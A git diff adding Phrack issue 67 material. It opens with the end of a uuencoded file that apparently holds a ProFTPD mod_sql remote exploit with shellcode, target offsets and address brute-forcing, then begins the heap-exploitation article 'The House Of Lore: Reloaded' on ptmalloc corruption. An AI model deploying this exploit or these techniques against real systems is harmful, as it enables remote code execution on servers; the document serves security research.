+M8F4I*2`J(#(*"0EF86ME7VQE;B`K/2!L96XH<V5L9BYS:&5L;&-O9&4I"@H)
+M"2-F;W(@:2!I;B!R86YG92@P+"`Q-BDZ"@D)=VAI;&4H;&5N*')E<W5L=',I
+M(#P@,C`P*3H*"0D)=')I9V=E<F%U=&@@/2!S96QF+FUA:V5?=7-E<E]S=')I
+M;F<H;W9E<G=R:71E7VQE;BP@=6-L*0H)"0D*"0D)86-C97!T86)L92`](#`*
+M"0D)=VAI;&4H86-C97!T86)L92`A/2`R*3H*"0D)"69A:V5A=71H(#T@<V5L
+M9BYM86ME7W5S97)?<W1R:6YG*#`L('5C;"P@9F%K95]L96XI"0H*"0D)"69I
+M<G-T7V]F9G-E="`]('1A<F=E=%LG<W1O<"==("L@;&5N*")087-S=V]R9"!R
+M97%U:7)E9"!F;W(@(BD@*R!L96XH<W1R*&9A:V5A=71H*2D*"0D)"6%C8V5P
+M=&%B;&4@(#T@<V5L9BYC:&5C:U]F;W)?8F%D7V-H87)S*'-T<G5C="YP86-K
+M*"(\3"(L(&9I<G-T7V]F9G-E="DI"@D)"0EA8V-E<'1A8FQE("L]('-E;&8N
+M8VAE8VM?9F]R7V)A9%]C:&%R<RAS=')U8W0N<&%C:R@B/$PB+"!F:7)S=%]O
+M9F9S970K,C@I*0H*"0D)"2-P<FEN="`B9FER<W1?;V9F<V5T.B`P>"4P.'@L
+M(&%C8V5P=&%B;&4Z("5R(B`E("AF:7)S=%]O9F9S970L(&%C8V5P=&%B;&4I
+M"@H)"0EF86ME7W-T<FEN9R`]('-T<BAF86ME875T:"D*"0D)9F%K95]S=')I
+M;F<@*ST@<W1R*'!C*2`J(#(*"0D)(W!R:6YT('-T<BAP8RDN96YC;V1E*"=H
+M97@G*0H)"0D*"0D)9F%K95]S=')I;F<@*ST@<V5L9BYS:&5L;&-O9&4*"@D)
+M"6%S<V5R="AF86ME7W-T<FEN9RYF:6YD*'-T<G5C="YP86-K*"(\3"(L(#!X
+M9&5A9&)E968I*2`A/2`M,2D*"0D)87-S97)T*&QE;BAF86ME7W-T<FEN9RD@
+M/3T@;&5N*'-T<BAF86ME875T:"DI*V9A:V5?;&5N*0H*"@D)"71R:6=G97)?
+M<W1R:6YG("`]('-T<BAT<FEG9V5R875T:"D*"0D)=')I9V=E<E]S=')I;F<@
+M*ST@<W1R*'!B*0H)"0ET<FEG9V5R7W-T<FEN9R`K/2!S='(H<&@I"@D*"0D)
+M87-S97)T*&QE;BAT<FEG9V5R7W-T<FEN9RD@/3T@;&5N*'-T<BAT<FEG9V5R
+M875T:"DI*V]V97)W<FET95]L96XI"@D*"0D)='AT(#T@<W1R*'-E;&8N=&EM
+M96ET*&9A:V5?<W1R:6YG+"!T<FEG9V5R7W-T<FEN9RDI"@D)"7)E<W5L='-;
+M='AT72`]("AF86ME875T:"P@=')I9V=E<F%U=&@L(&QE;BAF86ME7W-T<FEN
+M9RDL(&QE;BAT<FEG9V5R7W-T<FEN9RDI"@D)"7)E<&QA>5MT>'1=(#T@*&9A
+M:V5?<W1R:6YG+"!T<FEG9V5R7W-T<FEN9RD*"0D)"0H*"0D)(VEF*'-E;&8N
+M<VAE;&Q?:&%N9&QE<B@I*3H*"0D)(PEP<FEN="`B+2UU<V5R+6-O;'5M;BUL
+M96YG=&@])60L(&9A:V5A=71H+FQE;F=T:#H@)60L('1R:6=G97)A=71H+FQE
+M;F=T:#H@)60B("4@*`H)"0DC"0EC;VQU;6Y?;&5N9W1H+"!F86ME875T:"YL
+M96YG=&@L('1R:6=G97)A=71H+FQE;F=T:`H)"0DC"2D*"0D)(PH)"0DC"7-E
+M;&8N<V%V95]C86-H92AT87)G970L(&9A:V5?<W1R:6YG+"!T<FEG9V5R7W-T
+M<FEN9RD*"0D)(PEB<F5A:PH*"0D)<')I;G0@(B(*"@D):V5Y<R`](')E<W5L
+M=',N:V5Y<R@I"@D):V5Y<RYS;W)T*"D*"0D*"0EF;W(@:V5Y(&EN(&ME>7-;
+M+38Z73H*"0D)9F%K92P@=')I9V=E<BP@9FPL('1L(#T@<F5S=6QT<UMK97E=
+M"@D)"7!R:6YT("(E<R(@)2!K97D*"0D)<')I;G0@(EQT)7,B("4@9F%K90H)
+M"0EP<FEN="`B7'0E<R(@)2!T<FEG9V5R"@D)"7!R:6YT("(M+2(*"@H)"69P
+M(#T@;W!E;B@G=&5S="YT>'0G+"`G=RLG*0H)"69P+G=R:71E*")<;B(N:F]I
+M;BAK97ES*2D*"0EF<"YC;&]S92@I"@D)"@D)9G`@/2!O<&5N*"=T97-T+G!K
+M;"<L("=W*R<I"@D)9G`N=W)I=&4H<&EC:VQE+F1U;7!S*')E<&QA>2DI"@D)
+M9G`N8VQO<V4H*0H*"0EW:&EL92@Q*3H*"0D)<R`](')A=U]I;G!U="@B4&QE
+M87-E(&5N=&5R(&]F9G-E="!T;R!R97!L87D@6VUA>"`E<UT^("(@)2`H;&5N
+M*')E<W5L=',I+3$I("D*"0D)<R`](',N<W1R:7`H*0H)"0EI9BAS(#T](")E
+M>&ET(BDZ(`H)"0D)8G)E86L*"@D)"6ED>"`](&EN="AS*0H*"0D)<V5L9BYR
+M97!L87DH*G)E<&QA>5MK97ES6VED>%U=*0H*"0ES(#T@<F%W7VEN<'5T*")7
+M:&EC:"!O9F9S970@9&\@>6]U('=A;G0@=&\@8G)U=&5F;W)C92!W:71H/B`B
+M*0H)"7,@/2!S+G-T<FEP*"D*"0EI9'@@/2!I;G0H<RD*"0D*"0ER971U<FX@
+M<F5S=6QT<UMK97ES6VED>%U="@H)9&5F(')U;BAS96QF+"!T87)G970I.@H)
+M"7!R:6YT(");*UT@0G)U=&5F;W)C:6YG(&UE;6]R>2!A;&QO8V%T:6]N<R!F
+M;W(@)7,B("4@=&%R9V5T6R=N86UE)UT*"@D)9F]U;F0@/2!&86QS90H*"0ES
+M96QF+G-H96QL8V]D92`](&]P96XH)W-H96QL8V]D92YB:6XG+"`G<B<I+G)E
+M860H*0H)"2,@<G5B>2`O<F]O="]M<V8S+VUS9G!A>6QO860@;&EN=7@O>#@V
+M+V5X96,@0TU$/2]B:6XO<V@@4B`@/B!S:&5L;&-O9&4R+F)I;@H)"7-E;&8N
+M<VAE;&QC;V1E,B`](&]P96XH)W-H96QL8V]D93(N8FEN)RP@)W(G*2YR96%D
+M*"D*"@D)9F]R('5C;"!I;B!S96QF+G5S97)?8V]L=6UN7VQE;F=T:',Z"@D)
+M"69A:V5A=71H+"!T<FEG9V5R875T:"P@9FPL('1L(#T@<V5L9BYF:6YD7W-T
+M<FEN9W,H=&%R9V5T+"!U8VPI"@H)"0EA9&1R97-S97,@/2!R86YG92AT87)G
+M971;)W-T87)T)UTL('1A<F=E=%LG<W1O<"==+"!T87)G971;)W-T97`G72D*
+M"0D)<')I;G0@861D<F5S<V5S"@D)"2-A9&1R97-S97,@/2!F:6QT97(H;&%M
+M8F1A('@Z("AS970H<W1R=6-T+G!A8VLH(CQ,(BP@>"DI("8@<V5L9BYB861C
+M:&%R<RD@/3T@<V5T*"DL(&%D9')E<W-E<RD*"0D)(V%D9')E<W-E<R`](&9I
+M;'1E<BAL86UB9&$@>#H@*'-E="AS=')U8W0N<&%C:R@B/$PB+"!X*S8T*2D@
+M)B!S96QF+F)A9&-H87)S*2`]/2!S970H*2P@861D<F5S<V5S*0H)"0D*"@D)
+M"7!R:6YT(")';W0@)60@=&%R9V5T<R(@)2!L96XH861D<F5S<V5S*0H)"0EF
+M;W(@861D<F5S<R!I;B!A9&1R97-S97,Z"@D)"0EP<FEN="`B5')Y:6YG(#!X
+M)3`X>"(@)2!A9&1R97-S"@H)"0D);6]D(#T@;&5N*")087-S=V]R9"!R97%U
+M:7)E9"!F;W(@(BD*"0D)"69A:V5?<W1R:6YG("`]('-T<BAF86ME875T:"D*
+M"0D)"6UO9"`K/2!L96XH9F%K95]S=')I;F<I"@D)"0EM;V0@)3T@-`H*"0D)
+M"7!C(#T@4&]O;$-L96%N=7`H"@D)"0D)861D<F5S<RMM;V0K."P*"0D)"0EA
+M9&1R97-S*VUO9"LX+`H)"0D)"6%D9')E<W,K;6]D*S@L"@D)"0D)861D<F5S
+M<RMM;V0K*S@X"@D)"0DI"@H)"0D)9F%K95]S=')I;F<@*ST@<W1R*'!C*2`J
+M(#(@"@D)"0EF86ME7W-T<FEN9R`K/2!S96QF+G-H96QL8V]D90H*"0D)"7!B
+M(#T@4&]O;$)L;VLH861D<F5S<RLQ,#`L(&%D9')E<W,@*R`S,#`L(&%D9')E
+M<W,@*R`R,#`L(#!X-#$T,C0S-#0I"@D)"0EP:"`](%!O;VQ(96%D97(H"@D)
+M"0D)861D<F5S<RLP>#(P,"P*"0D)"0EA9&1R97-S*S!X,S`P+`H)"0D)"6%D
+M9')E<W,K;6]D+3(T+"`C(&]U<B!C;&5A;G5P"@D)"0D)861D<F5S<RLP>#0P
+M,"P*"0D)"0EA9&1R97-S*S!X-3`P+`H)"0D)"6%D9')E<W,K,'@V,#`L"@D)
+M"0D)861D<F5S<RLP>#<P,"P*"0D)"0EA9&1R97-S*S!X-S`P+"`C(&)L86@N
+M"@D)"0DI"@H)"0D)=')I9V=E<E]S=')I;F<@(#T@<W1R*'1R:6=G97)A=71H
+M*0H)"0D)=')I9V=E<E]S=')I;F<@*ST@<W1R*'!B*0H)"0D)=')I9V=E<E]S
+M=')I;F<@*ST@<W1R*'!H*0H*"0D)"2-P<FEN="`B;&5N*&8I.B(L(&QE;BAF
+M86ME7W-T<FEN9RD*"0D)"2-P<FEN="`B9FPZ(BP@9FP*"0D)"2-P<FEN="`B
+M;&5N*'0I.B(L(&QE;BAT<FEG9V5R7W-T<FEN9RD*"0D)"2-P<FEN="`B=&PZ
+M(BP@=&P*"0D)"6%S<V5R="AL96XH9F%K95]S=')I;F<I(#T](&9L*0H)"0D)
+M87-S97)T*&QE;BAT<FEG9V5R7W-T<FEN9RD@/3T@=&PI"@H)"0D)<V5L9BYC
+M;VYN96-T*"D*"0D)"7-E;&8N9&]?9F%K95]A=71H*&9A:V5?<W1R:6YG*0H*
+M"0D)"2-X(#T@<F%W7VEN<'5T*")H:70@96YT97(@=&\@=')I9V=E<B!V=6QN
+M/B`B*0H*"0D)"7-E;&8N<VMT+G-E;F0H(E5315(@)7-<<EQN(B`E('1R:6=G
+M97)?<W1R:6YG*0H*"0D)"7)L:7-T+"!W;&ES="P@>&QI<W0@/2!S96QE8W0N
+M<V5L96-T*%MS96QF+G-K=%TL(%M=+"!;<V5L9BYS:W1=+"`U+C`I"@D)"0EI
+M9BAR;&ES="`]/2!;72!A;F0@>&QI<W0@/3T@6UTI.@H)"0D)"7!R:6YT(")&
+M;W5N9"!`(#!X)3`X>"(@)2!A9&1R97-S"@D)"0D)(R!"3$%(+B!N965D('1O
+M(&%V;VED('1H:7,@9'5E('1O('-S;`H)"0D)"7-E;&8N<VMT+G-E;F0H<V5L
+M9BYS:&5L;&-O9&4R*0H)"0D)"7-E;&8N<VAE;&Q?:&%N9&QE<B@I"@D)"0D)
+M<WES+F5X:70H,2D*"F]F9G-E=%]T87)G971S(#T@6PH)>R`*"0DG;F%M92<Z
+M("=&961O<F$@,3`@4')O1E101"!P<F]F='!D+6UY<W%L+3$N,RXQ+38G+`H)
+M"2=T>7!E)SH@)V]F9G-E="<L"@D))W)E<W!?8G5F)SH@,'@X,&5D.#@P+`H)
+M"2=O9F9S970G.B`P>#@P-C-E93,L"@D))V5X96-V)SH@,'@P.#`U,C9B."P*
+M"7TL"@E[(`H)"2=N86UE)SH@)T9E9&]R82`Y(%!R;T944$0@<')O9G1P9"UM
+M>7-Q;"TQ+C,N,2TS)RP*"0DG='EP92<Z("=O9F9S970G+`H)"2=R97-P7V)U
+M9B<Z(#!X,#@P96)C-C`L"@D))V]F9G-E="<Z(#!X,#@P-C,Y.&4L"@D))V5X
+M96-V)SH@,'@P.#`U,C8V."P*"7TL"ET*"F)R=71E9F]R8V5?=&%R9V5T<R`]
+M(%L*"7L*"0DC(#`X,&4T,#`P+3`X,&5C,#`P"@D))VYA;64G.B`G4')O1E10
+M1"!&0R`Q,"<L"@D))W-T87)T)SH@,'@X,&5D.#@P*S$R."P*"0DG<W1O<"<Z
+M(#!X.#!E9#@P-"P*"0DG<W1E<"<Z("TR."P*"7TL"@E["@D)(R`P.#!F,3(R
+M,"!L("`@("!/("YB<W,@("`P,#`P,30P,"`@("`@("`@("`@("`@<F5S<%]B
+M=68*"0DG;F%M92<Z("=D96)I86X@=&5S="<L"@D))W-T87)T)SH@,'@P.#!F
+M,3(R,"LR,#`L"@D))W-T;W`G.B`P>#`X,&8Q,C(P*S@P+`H)"2=S=&5P)SH@
+M+3(X+`H)?0I="@ID968@9'5M<%]T87)G971S*"DZ"@EC;W5N=&5R(#T@,0H)
+M<')I;G0@(D]F9G-E="!B87-E9"!T87)G971S(&%V86EL86)L93HB"@EF;W(@
+M=&%R9V5T(&EN(&]F9G-E=%]T87)G971S.@H)"7!R:6YT(")<=%1A<F=E="!;
+M)61=("T@)7,B("4@*&-O=6YT97(L('1A<F=E=%LG;F%M92==*0H)"6-O=6YT
+M97(@*ST@,0H)"@EC;W5N=&5R(#T@,0H)<')I;G0@(B(*"7!R:6YT(")"<G5T
+M969O<F-E('1A<F=E=',@879A:6QA8FQE.B(*"69O<B!T87)G970@:6X@8G)U
+M=&5F;W)C95]T87)G971S.@H)"7!R:6YT(")<=%1A<F=E="!;)61=("T@)7,B
+M("4@*&-O=6YT97(L('1A<F=E=%LG;F%M92==*0H*"7D@/2`P+S`*"@ES>7,N
+M97AI="@Q*0H*9&5F('!A<G-E7V%R9W,H87)G<RDZ"@EP87)S97(@/2!/<'1I
+M;VY087)S97(H=7-A9V4](G5S86=E.B`E<')O9R!;;W!T:6]N<UT@:&]S=%]T
+M;U]E>'!L;VET(BD*"7!A<G-E<BYA9&1?;W!T:6]N*"(M="(L("(M+71A<F=E
+M="(L(&%C=&EO;CTB<W1O<F4B+"!T>7!E/2)I;G0B+"!H96QP/2)$:7-T<FEB
+M=71I;VX@=&\@=&%R9V5T(BP@9&5F875L=#TP+"!D97-T/2)T87)G970B*0H)
+M<&%R<V5R+F%D9%]O<'1I;VXH(BUP(BP@(BTM<&]R="(L(&%C=&EO;CTB<W1O
+M<F4B+"!H96QP/2)#;VYN96-T(&]N('!O<G0B+"!D969A=6QT/3(Q*0H)<&%R
+M<V5R+F%D9%]O<'1I;VXH(BUS(BP@(BTM<W-L(BP@86-T:6]N/2)S=&]R95]T
+M<G5E(BP@:&5L<#TB16YA8FQE(%-33"!F;W(@97AP;&]I=&%T:6]N("AV:6$@
+M4D9#-#(Q-RDB+"!D969A=6QT/49A;'-E*0H)<&%R<V5R+F%D9%]O<'1I;VXH
+M(BUM(BP@(BTM;6]D92(L(&%C=&EO;CTB<W1O<F4B+"!T>7!E/2)C:&]I8V4B
+M+"!C:&]I8V5S/5LB8G)U=&5F;W)C92(L(")O9F9S971S(ETL(&1E9F%U;'0]
+M(F]F9G-E=',B*0H)<&%R<V5R+F%D9%]O<'1I;VXH(BUL(BP@(BTM;&ES="UT
+M87)G971S(BP@86-T:6]N/2)S=&]R95]T<G5E(BP@9&5F875L=#U&86QS92D*
+M"@EG<F]U<"`]($]P=&EO;D=R;W5P*'!A<G-E<BP@(D1E8G5G9VEN9R!O<'1I
+M;VYS(BP@(E1H97-E(&]P=&EO;G,@87)E(&UO<W1L>2!U<V5F=6P@9F]R(&1E
+M8G5G9VEN9R!T:&4@97AP;&]I="!C;V1E+"!O<B!I9B!Y;W4@:VYO=R!H;W<@
+M=&AE(')E;6]T92!M86-H:6YE(&ES(&-O;F9I9W5R960N(BD*"6=R;W5P+F%D
+M9%]O<'1I;VXH(BTM=7-E<BUC;VQU;6XM;&5N9W1H(BP@86-T:6]N/2)S=&]R
+M92(L(&1E9F%U;'0],"P@:&5L<#TB4U%,(%5S97)N86UE(&-O;'5M;B!L96YG
+M=&@N(BP@='EP93TB:6YT(BP@9&5S=#TB=7-E<E]C;VQU;6Y?;&5N9W1H(BD*
+M"6=R;W5P+F%D9%]O<'1I;VXH(BTM<VQE97`M869T97(M8V]N;F5C="(L(&%C
+M=&EO;CTB<W1O<F5?=')U92(L(&AE;'`](E-L965P(&$@8V]U<&QE(&]F('-E
+M8V]N9',@<V\@82!D96)U9V=E<B!C86X@8F4@8V]N;F5C=&5D(BP@9&5F875L
+M=#U&86QS92P@9&5S=#TB<VQE97!?869T97)?8V]N;F5C="(I"@EG<F]U<"YA
+M9&1?;W!T:6]N*"(M+6EG;F]R92UC86-H92(L(&%C=&EO;CTB<W1O<F5?=')U
+M92(L(&AE;'`](DEG;F]R92!T:&4@8V%C:&4@;V8@<W5C8V5S<V9U;"!P<F5V
+M:6]U<R!A='1E;7!T<R(L(&1E9F%U;'0]1F%L<V4L(&1E<W0](FEG;F]R95]C
+M86-H92(I"@EG<F]U<"YA9&1?;W!T:6]N*"(M+7-E960B+"!A8W1I;VX](G-T
+M;W)E(BP@='EP93TB:6YT(BP@:&5L<#TB4V5E9"!T:&4@<F%N9&]M(&YU;6)E
+M<B!W:71H('-U<'!L:65D('9A;'5E(BP@9&5F875L=#TP+"!D97-T/2)S965D
+M(BD*"@EP87)S97(N861D7V]P=&EO;E]G<F]U<"AG<F]U<"D*"0H);W!T<RP@
+M87)G<R`]('!A<G-E<BYP87)S95]A<F=S*&%R9W,I"@H):68H;&5N*&%R9W,I
+M(#T](#`I.@H)"7!R:6YT(")0;&5A<V4@<W!E8VEF>2!T:&4@:&]S="!T;R!E
+M>'!L;VET(@H)"7-Y<RYE>&ET*#$I"@H):68H;W!T<RYT87)G970@/3T@,"DZ
+M"@D)<')I;G0@(E!L96%S92!S<&5C:69Y(&$@=&%R9V5T('1O(&%T=&%C:RXN
+M(@H)"61U;7!?=&%R9V5T<R@I"@H):68H;W!T<RYL:7-T7W1A<F=E=',I.@H)
+M"61U;7!?=&%R9V5T<R@I"@H):68H;W!T<RYS<VP@86YD(&YO="!S<VQ?879A
+M:6QA8FQE*3H*"0EP<FEN="`B+2US<VP@=7-E9"P@8G5T('1H:7,@=F5R<VEO
+M;B!O9B!P>71H;VX@9&]E<R!N;W0@:&%V92`G:6UP;W)T('-S;"<@;W!T:6]N
+M(@H)"7!R:6YT(")&;W(@=F5R<VEO;G,@;V8@<'ET:&]N(#P@,BXV+"!Y;W4@
+M8V%N('5S92!H='1P.B\O<'EP:2YP>71H;VXN;W)G+W!Y<&DO<W-L(@H)"7!R
+M:6YT(")T;R!G970@=&AA="!S=7!P;W)T(@H)"7-Y<RYE>&ET*#$I"@H):68H
+M;W!T<RYS965D*3H*"0ER86YD;VTN<V5E9"AO<'1S+G-E960I"@D)<')I;G0@
+M(ELK72!3965D960@=VET:"`E9"(@)2!O<'1S+G-E960*"@ER971U<FX@;W!T
+M<RP@87)G<PH*9&5F(&UA:6XH87)G=6UE;G1S*3H*"@EI9B@B+2UT97-T(B!I
+M;B!A<F=U;65N=',I.@H)"6EM<&]R="!D;V-T97-T"@D)9&]C=&5S="YT97-T
+M;6]D*"D*"0ER971U<FX*"@EO<'1S+"!A<F=S(#T@<&%R<V5?87)G<RAA<F=U
+M;65N=',I"@H):68H;W!T<RYM;V1E(#T](")O9F9S971S(BDZ"@D)<&\@/2!0
+M<F]&5%!$7T]F9G-E=',H87)G<ULP72P@;W!T<RD*"0EI9BAO<'1S+G1A<F=E
+M="`\(#$@;W(@;W!T<RYT87)G970@/B!L96XH;V9F<V5T7W1A<F=E=',I*3H*
+M"0D)9'5M<%]T87)G971S*"D*"0H)"7!O+G)U;BAO9F9S971?=&%R9V5T<UMO
+M<'1S+G1A<F=E="TQ72D*"0H)96QI9BAO<'1S+FUO9&4@/3T@(F)R=71E9F]R
+M8V4B*3H*"0EP8B`](%!R;T944$1?0G)U=&5F;W)C92AA<F=S6S!=+"!O<'1S
+M*0H)"6EF*&]P=',N=&%R9V5T(#P@,2!O<B!O<'1S+G1A<F=E="`^(&QE;BAB
+M<G5T969O<F-E7W1A<F=E=',I*3H*"0D)9'5M<%]T87)G971S*"D*"@D)<&(N
+M<G5N*&)R=71E9F]R8V5?=&%R9V5T<UMO<'1S+G1A<F=E="TQ72D*"FEF(%]?
+K;F%M95]?(#T]("=?7VUA:6Y?7R<Z"@EM86EN*'-Y<RYA<F=V6S$Z72D*"@``
+`
+end
diff --git a/phrack67/8.txt b/phrack67/8.txt
new file mode 100644
index 0000000..243b871
--- /dev/null
+++ b/phrack67/8.txt
@@ -0,0 +1,2824 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x08 of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ The House Of Lore: Reloaded ]=-------------------=|
+|=-------------=[ ptmalloc v2 & v3: Analysis & Corruption ]=-------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[  by blackngel  ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+                  ^^
+              *`* @@ *`*     HACK THE WORLD
+             *   *--*   *    
+                  ##         <blackngel1@gmail.com>
+                  ||         <black@set-ezine.org>
+                 *  *
+                *    *       (C) Copyleft 2010 everybody
+               _*    *_
+
+
+--[ CONTENTS
+
+   1 - Preface
+
+   2 - Introduction
+
+     2.1 - KiddieDbg Ptmalloc2
+
+     2.2 - SmallBin Corruption
+
+         2.2.1 - Triggering The HoL(e)
+
+         2.2.2 - A More Confusing Example
+
+   3 - LargeBin Corruption Method
+
+   4 - Analysis of Ptmalloc3
+
+     4.1 - SmallBin Corruption (Reverse)
+
+     4.2 - LargeBin Method (TreeBin Corruption)
+
+     4.3 - Implement Security Checks
+
+         4.3.1 - Secure Heap Allocator (Utopian)
+
+         4.3.2 - dnmalloc
+
+         4.3.3 - OpenBSD malloc
+
+   5 - Miscellany, ASLR and More
+
+   6 - Conclusions
+
+   7 - Acknowledgments
+
+   8 - References
+
+   9 - Wargame Code
+
+--[ END OF CONTENTS
+
+
+
+           .-----------.
+---[ 1 ---[   Preface   ]---
+           .-----------.
+
+No offense, I could say that sometimes the world of hackers (at least) is 
+divided into two camps: 
+    
+    1.- The illustrious characters who spend many hours to find holes in
+    the current software.
+    
+    2.- And the hackers who spend most of their time to find a way to
+    exploit a vulnerable code/environment that does not exist yet.
+
+Maybe, it is a bit confusing but this is like the early question: which 
+came first, the chicken or the egg? Or better... Which came first, the bug 
+or the exploit?
+
+Unlike what happens with an ordinary Heap Overflow, where we could say it's
+the logical progression over time of a Stack Overflow, with The House of 
+Lore technique seems to happen something special and strange, we know it's 
+there (a thorn in your mind), that something happens, something is wrong 
+and that we can exploit it.
+
+But we do not know how to do it. And that is all over this stuff, we know
+the technique (at least the Phantasmal Phantasmagoria explanation), but
+perhaps has anyone seen a sample vulnerable code that can be exploited?
+
+Maybe someone is thinking: well, if the bug exists and it is an ordinary 
+Heap Overflow... 
+
+     1.- What are the conditions to create a new technique? 
+     
+     2.- Why a special sequence of calls to malloc( ) and free( ) allows a 
+     specific exploit technique and why another sequence needs other 
+     technique? 
+     
+     3.- What are the names of those sequences? Are the sequences a bug or 
+     is it pure luck?
+
+This can give much food for thought. If Phantasmal had left a clear 
+evidence of his theory, surely we would have forgotten about it, but as 
+this did not happened, some of us are spending all day analyzing the way to 
+create a code that can be committed with a technique that a virtual expert 
+gave us in 2005 in a magnificent article that everyone already knows, 
+right?
+
+We speak about "Malloc Maleficarum" [1], great theory that I myself had the 
+opportunity to demonstrate in practice in the "Malloc Des-Maleficarum" [2] 
+article. But unfortunately I left a job unresolved yet. In the pas I was 
+not able to interpret so correct one of the techniques that were presented 
+by Phantasmal, we speak of course of "The House of Lore" technique, but in
+a moment of creativity it seems that I finally found a solution.
+
+Here I submit the details of how a vulnerable code can be attacked with The
+House of Lore (THoL from now), thus completing a stage that for some reason
+was left unfinished.
+
+In addition, we will target not only the smallbin corruption method which
+many have heard of, but we also introduce the complications in largebin 
+method and how to solve them. I also present two variants based on these 
+techniques that I have found to corrupt the Ptmalloc3 structure.
+
+There are also more content in this paper like a small program where to 
+apply one of the techniques can be exploited, it is very useful for an 
+exploiting-wargame.
+
+And... yes, THoL was exactly the thorn that I had into my mind.
+
+
+
+               << One can resist the invasion
+                  of an army but one cannot
+                  resist the invasion of ideas. >>
+
+                                   [ Victor Hugo ]
+
+
+
+           .----------------.
+---[ 2 ---[   Introduction   ]---
+           .----------------.
+
+Then, before starting with practical examples, we reintroduce the technical
+background of the THoL. While that one might take the Phantasmal's theory
+as the only support for subsequent descriptions, we will offer a bigger and
+more deep approach to the subject and also some small indications on how 
+you can get some information from Ptmalloc2 in runtime without having to 
+modify or recompile your personal GlibC.
+
+We mention that dynamic hooks could be a better way to this goal. More
+control, more conspicuous.
+
+
+
+               << Great spirits have always encountered
+                  violent opposition from mediocre minds. >>
+
+                                         [ Albert Einstein ]
+
+
+
+             .-----------------------.
+---[ 2.1 ---[   KiddieDbg Ptmalloc2   ]---
+             .-----------------------.
+
+In an effort to make things easier to the reader when we will perform all
+subsequent tests, let's indicate the simple way you can use PTMALLOC2 to
+obtain the necessary information from within each attack.
+
+To avoid the tedious task of recompiling GLIBC when one makes a minor 
+change in "malloc.c", we decided to directly download the sources of 
+ptmalloc2 from: http://www.malloc.de/malloc/ptmalloc2-current.tar.gz.
+
+Then we compiled it in a Kubuntu 9.10 Linux distribution (it will not be a 
+great effort to type a make) and you can directly link it as a static 
+library to each of our examples like this:
+
+   gcc prog.c libmalloc.a -o prog
+
+However, before compiling this library, we allowed ourselves the luxury of 
+introducing a pair of debugging sentences. To achieve this we made use of a
+function that is not accessible to everybody, one has to be very eleet to 
+know it and only those who have been able to escape to Matrix have the 
+right to use it. This lethal weapon is known among the gurus as 
+"printf( )".
+
+And now, enough jokes, here are the small changes in "malloc.c" to get some 
+information at runtime:
+
+
+----- snip -----
+
+Void_t*
+_int_malloc(mstate av, size_t bytes)
+{
+....
+  checked_request2size(bytes, nb);
+
+  if ((unsigned long)(nb) <= (unsigned long)(av->max_fast)) {
+    ...
+  }
+
+  if (in_smallbin_range(nb)) {
+    idx = smallbin_index(nb);
+    bin = bin_at(av,idx);
+    if ( (victim = last(bin)) != bin) {
+
+printf("\n[PTMALLOC2] -> (Smallbin code reached)");
+printf("\n[PTMALLOC2] -> (victim = [ %p ])", victim);
+
+      if (victim == 0) /* initialization check */
+        malloc_consolidate(av);
+      else {
+        bck = victim->bk;
+
+printf("\n[PTMALLOC2] -> (victim->bk = [ %p ])\n", bck);
+
+        set_inuse_bit_at_offset(victim, nb);
+        bin->bk = bck;
+        bck->fd = bin;
+
+        if (av != &main_arena)
+	  victim->size |= NON_MAIN_ARENA;
+        check_malloced_chunk(av, victim, nb);
+        return chunk2mem(victim);
+      }
+    }
+  }
+
+----- snip -----
+
+
+Here we can know when a chunk is extracted from its corresponding bin to
+satisfy a memory request of appropriate size. In addition, we can control
+the pointer value that takes the "bk" pointer of a chunk if it has been
+previously altered.
+
+
+----- snip -----
+
+  use_top:
+    victim = av->top;
+    size = chunksize(victim);
+
+    if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
+      ........
+printf("\n[PTMALLOC2] -> (Chunk from TOP)");
+      return chunk2mem(victim);
+    }
+
+----- snip -----
+
+
+Here you simply provide a warning to be aware of when a memory request is
+served from the Wilderness chunk (av->top).
+
+
+----- snip -----
+
+        bck = unsorted_chunks(av);
+        fwd = bck->fd;
+        p->bk = bck;
+        p->fd = fwd;
+        bck->fd = p;
+        fwd->bk = p;
+printf("\n[PTMALLOC2] -> (Freed and unsorted chunk [ %p ])", p);
+
+----- snip -----
+
+
+Unlike the first two changes which were introduced in the "_int_malloc( )"
+function, the latter did it in "_int_free( )" and clearly indicates when a 
+chunk has been freed and introduced into the unsorted bin for a further use
+of it.
+
+
+
+               << I have never met a man so
+                  ignorant that I couldn't
+                  learn something from him. >>
+
+                           [ Galileo Galilei ]
+
+
+
+             .-----------------------.
+---[ 2.2 ---[   SmallBin Corruption   ]---
+             .-----------------------.
+
+Take again before starting the piece of code that will trigger the 
+vulnerability described in this paper:
+
+
+----- snip ----- 
+
+  if (in_smallbin_range(nb)) {
+    idx = smallbin_index(nb);
+    bin = bin_at(av,idx);
+    if ( (victim = last(bin)) != bin) {
+
+      if (victim == 0) /* initialization check */
+        malloc_consolidate(av);
+      else {
+        bck = victim->bk;
+        set_inuse_bit_at_offset(victim, nb);
+        bin->bk = bck;
+        bck->fd = bin;
+
+        if (av != &main_arena)
+	  victim->size |= NON_MAIN_ARENA;
+        check_malloced_chunk(av, victim, nb);
+        return chunk2mem(victim);
+      }
+
+----- snip ----- 
+
+
+To reach this area of the code inside "_int_malloc( )", one assumes the 
+fact that the size of memory request is largest that the current value of 
+"av->max_fast" in order to pass the first check and avoid fastbin[ ] 
+utilization. Remember that this value is "72" by default.
+
+This done, then comes the function "in_smallbin_range(nb)" which checks in 
+turn if the chunk of memory requested is less than that MIN_LARGE_SIZE, 
+defined to 512 bytes in malloc.c.
+
+We know from the documentation that: "the size bins for less than 512 bytes
+contain always the same size chunks". With this we know that if a chunk of
+a certain size has been introduced in its corresponding bin, a further
+request of the same size will find the appropriate bin and will return the
+previously stored chunk. The functions "smallbin_index(nb)" and 
+"bin_at(av, idx)" are responsible for finding the appropriate bin for the
+chunk requested.
+
+We also know that a "bin" is a couple of pointers "fd" and "bk", the 
+purpose of the pointers is to close the doubly linked list of the free 
+chunks. The macro "last(bin)" returns the pointer "bk" of this "fake 
+chunk", it also indicates the last available chunk in the bin (if any). If 
+none exists, the pointer "bin->bk" would be pointing to itself, then it 
+will fail the search and it would be out of the smallbin code.
+
+If there is an available chunk of adequate size, the process is simple. 
+Before being returned to the caller, it must be unlinked from the list and,
